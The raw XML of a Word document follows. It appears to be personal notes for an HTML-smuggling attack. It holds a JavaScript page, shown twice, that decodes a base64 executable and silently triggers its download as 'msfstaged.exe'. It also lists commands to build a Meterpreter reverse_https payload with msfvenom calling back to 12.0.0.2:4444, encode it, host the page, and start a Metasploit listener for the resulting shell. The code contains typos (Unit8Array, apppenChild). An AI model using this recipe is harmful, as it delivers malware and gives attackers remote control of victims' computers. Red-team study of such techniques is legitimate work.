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47B37" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67BDC1" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E7679B" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EA4FC" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      function base64toArrayBuffer(base64){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C452B" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        var binary_string = window.atob(base64);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56465292" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        var len = binary_string.length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA7D9C" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        var bytes = new Unit8Array(len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311A9F4" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        for(var i=0 ; i&lt;len; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1DF25" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">          bytes[i]=binary_string.charCodeAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA3853" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFB698" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">        return bytes.buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6CDB61" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129033D" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6DFD52" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var file = 'base64 payload.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9C1B8A" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var data = base64toArrayBuffer(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D95494" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var blob = new Blob([data] , {type: 'octet/stream'});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E6445" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var filename = 'msfstaged.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA96EE1" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F6FF9" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var a = document.createElement('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547932D" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      document.body.apppenChild(a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5F898" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      a.style = 'display: none';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EB17D" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      var url = window.URL.createObjectURL(blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616BF32E" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      a.href = url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D25B3" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      a.download = filename;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BEC69" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      a.click();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2974AC" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">      window.URL.revokeObjectURL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DE657" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A7B1C" w14:textId="77777777" w:rsidR="0028647B" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3E4D3" w14:textId="0AC1C368" w:rsidR="00B303DB" w:rsidRDefault="0028647B" w:rsidP="0028647B">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036E18D" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50054DAC" w14:textId="591731DD" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=12.0.0.2 LPORT=4444 -f exe -o /var/www/html/msfstaged.exe</w:t>
      </w:r>
      <w:r w:rsidR="00E822E3">
        <w:t xml:space="preserve">              (to generate payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C95D3" w14:textId="20D18C54" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>base64 /var/www/html/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B303DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>msfstaged</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="00E822E3">
        <w:t xml:space="preserve">           (to make it base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F974D4" w14:textId="38CA0D81" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>above html page in /var/www/html/htmlsmugglingpoc.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DF644" w14:textId="675ADE1D" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC4D40" w14:textId="275C858D" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AA9FC" w14:textId="43888A88" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB985D0" w14:textId="153FCE03" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/x64/meterpreter/reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1558F" w14:textId="74165E74" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set lhost=12.0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C253DC" w14:textId="15235474" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set lport=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4683AD79" w14:textId="038B35EF" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3A1FC" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67ACB6C0" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DCA81" w14:textId="7681ABE7" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE951F" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BB36F" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515F75C0" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      function base64toArrayBuffer(base64){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56352B14" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        var binary_string = window.atob(base64);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2806C" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        var len = binary_string.length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C58720" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        var bytes = new Unit8Array(len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DDB2F0" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        for(var i=0 ; i&lt;len; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082672A3" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">          bytes[i]=binary_string.charCodeAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46089BB3" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5349FC9D" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">        return bytes.buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D0407" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69405715" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459B8F6" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var file = 'base64 payload.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6119AAA1" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var data = base64toArrayBuffer(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3C698" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var blob = new Blob([data] , {type: 'octet/stream'});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD68277" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var filename = 'msfstaged.exe';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5819D8" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4752C" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var a = document.createElement('a');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FDCA5" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      document.body.apppenChild(a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270809A" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      a.style = 'display: none';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11028BE9" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      var url = window.URL.createObjectURL(blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BE15B4" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      a.href = url;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C536CBC" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      a.download = filename;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F5A0A" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      a.click();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE0148" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">      window.URL.revokeObjectURL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D740438" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2A2C0" w14:textId="77777777" w:rsidR="00B303DB" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B758371" w14:textId="79BA6162" w:rsidR="00701B6C" w:rsidRDefault="00B303DB" w:rsidP="00B303DB">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0070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133"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29A2A8E2"/>
    <w:lvl w:ilvl="0" w:tplc="EE641C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CF8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6ED69824"/>
    <w:lvl w:ilvl="0" w:tplc="F2240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84">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="185410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8A"/>
    <w:rsid w:val="0028647B"/>
    <w:rsid w:val="0040418A"/>
    <w:rsid w:val="004201B6"/>
    <w:rsid w:val="004F3EE9"/>
    <w:rsid w:val="006352FE"/>
    <w:rsid w:val="00701B6C"/>
    <w:rsid w:val="009A6913"/>
    <w:rsid w:val="00B303DB"/>
    <w:rsid w:val="00B72830"/>
    <w:rsid w:val="00CE01F9"/>
    <w:rsid w:val="00E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CB13"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{118D476D-73D6-43DF-8C9F-07360751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bediya</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>karthik bediya</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-17T05:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-17T06:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>